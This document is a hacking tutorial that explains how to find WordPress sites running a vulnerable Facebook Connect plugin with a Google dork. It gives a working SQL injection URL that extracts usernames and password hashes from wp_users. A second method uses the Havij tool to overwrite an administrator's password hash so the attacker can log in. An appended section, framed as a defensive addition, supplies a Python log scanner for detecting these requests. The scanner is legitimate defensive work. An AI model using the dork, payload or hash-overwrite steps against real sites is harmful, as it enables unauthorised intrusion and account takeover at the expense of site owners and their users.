How to hack WordPress websites | SQLi vulnerability & exploit



There are so many people using the Facebook Connect WordPress plugin for their blogs. They think it's cool. But it could be a big security hole. Here's the way to hack these sites.

Step 1: http://www.google.com

Step 2: Now enter this dork to find sites with the security hole.


inurl:"fbconnect_action=myhome"


Step 3: You will find many sites. Select the site you are comfortable with.

You will see something like this.


Step 4: Now replace

?fbconnect_action=myhome&userid=

with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the user name and password.


Step 6: The password is encrypted with WordPress md5 (blowfish). You need to decode this.


Step 7: Then find the administrator panel. Normally it is at

www.victrimsite.com/wp-admin
or 
www.victrimsite.com/wp-login.php

Note: Decoding this type of password may take a long time.

So here is another way to hack the password.


Step 1: Open Havij and paste the URL of the blog you are going to hack.

Example:

http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find the databases and tables.

Step 3: Select wp_users, then tick all columns. Then click on Get Data.

Step 4: You will see something like this.

Step 5: Now select any user and change the user_pass to

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now log in with the password hackintruths.
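As an added, defensive example that is not part of the original post: a small Python scanner that a site owner can run over web-server access logs to spot requests like the ones in Step 4 of the first method and in the Havij example above. It parses combined-format log lines, URL-decodes the query string, and flags any request to the plugin's `fbconnect_action=myhome` handler whose `fbuserid` (or `userid`) value is not a plain numeric id, reporting which injection indicators (UNION/SELECT, comment terminators, quotes, the `wp_users` table name, `concat(`) were seen. The log lines are constructed samples, and the assumption that a legitimate Facebook user id is purely numeric is mine, not something the post states.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log lines in combined format (not real traffic).
# Line 2 carries the percent-encoded UNION SELECT payload from the post,
# line 4 a classic quote-based probe, lines 1 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2011:10:14:02 +0000] "GET /?fbconnect_action=myhome&fbuserid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:15:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 7320 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2011:10:16:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:16:12 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators checked against the *decoded* parameter value, so %28 / + encoding
# does not hide them. Each name ends up in the finding's "reasons" list.
SQLI_PATTERNS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("comment_terminator", re.compile(r"--|#|/\*")),
    ("quote", re.compile(r"'")),
    ("wp_users_table", re.compile(r"\bwp_users\b", re.I)),
    ("concat", re.compile(r"\bconcat\s*\(", re.I)),
]


def analyse_request(path):
    """Return {'values': [...], 'reasons': [...]} for a request to the
    fbconnect 'myhome' action, or None if the request is not to that handler.
    An empty 'reasons' list means the id looked like a normal numeric id."""
    query = urlsplit(path).query
    params = parse_qs(query, keep_blank_values=True)  # decodes %xx and '+'
    if params.get("fbconnect_action") != ["myhome"]:
        return None
    # Check every supplied id value; the plugin may read either name.
    values = params.get("fbuserid", []) + params.get("userid", [])
    reasons = set()
    for value in values:
        if not value.isdigit():  # assumption: a Facebook user id is numeric
            reasons.add("non_numeric_id")
        for name, pattern in SQLI_PATTERNS:
            if pattern.search(value):
                reasons.add(name)
    return {"values": values, "reasons": sorted(reasons)}


def scan_log(text):
    """Parse each log line and collect findings for suspicious fbconnect requests."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        result = analyse_request(match["path"])
        if result and result["reasons"]:
            findings.append({
                "ip": match["ip"],
                "time": match["ts"],
                "status": match["status"],
                **result,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} status={finding['status']} "
              f"reasons={','.join(finding['reasons'])}")
```

Run it over a real access log with `scan_log(open("access.log").read())`; a `union_select` or `wp_users_table` hit on this endpoint is worth an immediate look at the database for changed `user_pass` values, since the second method in the post rewrites that column rather than cracking the hash.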





credits to: Devilscafe.in

